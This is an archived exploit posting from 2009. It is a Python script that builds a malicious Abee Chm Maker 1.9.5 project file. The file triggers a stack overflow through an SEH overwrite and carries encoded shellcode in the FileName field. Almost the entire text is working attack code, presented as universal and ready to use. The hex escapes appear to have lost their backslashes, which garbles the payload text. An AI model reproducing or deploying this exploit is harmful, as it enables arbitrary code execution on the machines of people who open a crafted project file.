abeechmmaker-overflow.txt
Posted on 28 March 2009
# exploit.py # Abee Chm Maker 1.9.5 Stack overflow Exploit # By:Encrypt3d.M!nd # # After importing "Devil_inside.cmp" file into the program # go to File>>Make CHM.. Then...watch :) . # # i've used SEH overwrite method to make it more stable. # btw:it's universal so don't bother your self with finding addresses ;) # ns = "xEBx06x90x90" sh = "x05x67x35x45" shellcode = ( "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x49x37x49x49x49x49x49x49x49x49x49x51x5ax6ax61" "x58x30x41x31x50x41x42x6bx42x41x71x32x42x42x42x32" "x41x41x30x41x41x58x38x42x42x50x75x4dx39x69x6cx4d" "x38x43x74x35x50x53x30x77x70x4ex6bx53x75x77x4cx4c" "x4bx63x4cx54x45x34x38x67x71x5ax4fx6cx4bx62x6fx75" "x48x6ex6bx41x4fx47x50x33x31x58x6bx63x79x4ex6bx36" "x54x4cx4bx45x51x68x6ex34x71x59x50x4cx59x4cx6cx4f" "x74x6fx30x72x54x47x77x58x41x39x5ax34x4dx57x71x69" "x52x48x6bx69x64x67x4bx46x34x66x44x74x44x53x45x6b" "x55x4cx4bx43x6fx31x34x67x71x78x6bx63x56x4cx4bx54" "x4cx62x6bx6ex6bx31x4fx67x6cx37x71x78x6bx4cx4bx45" "x4cx4cx4bx73x31x4ax4bx6cx49x51x4cx74x64x67x74x6b" "x73x34x71x6fx30x42x44x6cx4bx71x50x34x70x4ex65x4f" "x30x62x58x46x6cx6cx4bx41x50x44x4cx4cx4bx42x50x65" "x4cx4ex4dx6ex6bx50x68x34x48x4ax4bx73x39x6ex6bx4b" "x30x4cx70x57x70x63x30x37x70x4ex6bx42x48x57x4cx51" "x4fx56x51x48x76x31x70x73x66x6ex69x59x68x4ex63x4f" "x30x73x4bx66x30x65x38x68x70x6dx5ax34x44x51x4fx30" "x68x4ex78x4bx4ex6cx4ax54x4ex32x77x79x6fx79x77x41" "x73x75x31x72x4cx41x73x57x70x61") header1 = ( '<?xml version="1.0" encoding="Windows-1252" ?> ' '<XMLConfig><info>Chm Maker project</info> ' '<group name="Contents"> ' ' <group name="0"> ' ' <param name="Caption">filename</param> ' ' <param name="Level">0</param> ' ' <param name="FileName">'+"x41"*320+ns+sh+"x90"*20+shellcode+"x41" * 5000) header2 = ( '</param> ' ' </group> ' ' <param name="Count">1</param> ' '</group> ' '<group name="Keywords"> ' ' <param name="Count">0</param> ' '</group> ' '<group name="KeywordsFinder"> ' ' <param name="UseMeta">1</param> ' ' <param name="UseBold">1</param> ' ' <param name="UseItalic">0</param> ' ' <param name="UseUnder">0</param> ' ' <param name="UseHTag">1</param> ' ' <param name="UseTabHeader">0</param> ' ' <param name="MaxKeyLength">32</param> ' ' <param name="LiveUpdate">0</param> ' '</group> ' '<group name="Customize"> ' ' <param name="MainTitle">kkkkkkkkkkkkkkk</param> ' ' <param name="DefaultPage"></param> ' ' <param name="Left">0</param> ' ' <param name="Top">0</param> ' ' <param name="Width">0</param> ' ' <param name="Heigth">0</param> ' ' <param name="HideShow">1</param> ' ' <param name="Back">1</param> ' ' <param name="Forward">1</param> ' ' <param name="Stop">0</param> ' ' <param name="Refresh">0</param> ' ' <param name="Options">1</param> ' ' <param name="Print">1</param> ' ' <param name="Font">0</param> ' ' <param name="Locate">0</param> ' ' <param name="Home">0</param> ' ' <param name="HomePage"></param> ' ' <param name="Jump1">0</param> ' ' <param name="Jump1Page"></param> ' ' <param name="Jump1Title"></param> ' ' <param name="Jump2">0</param> ' ' <param name="Jump2Page"></param> ' ' <param name="Jump2Title"></param> ' ' <param name="Search">1</param> ' ' <param name="AdditionalFiles"></param> ' '</group> ' '</XMLConfig> ' ) file=open('Devil_Inside.cmp','w') file.write(header1+header2) file.close()
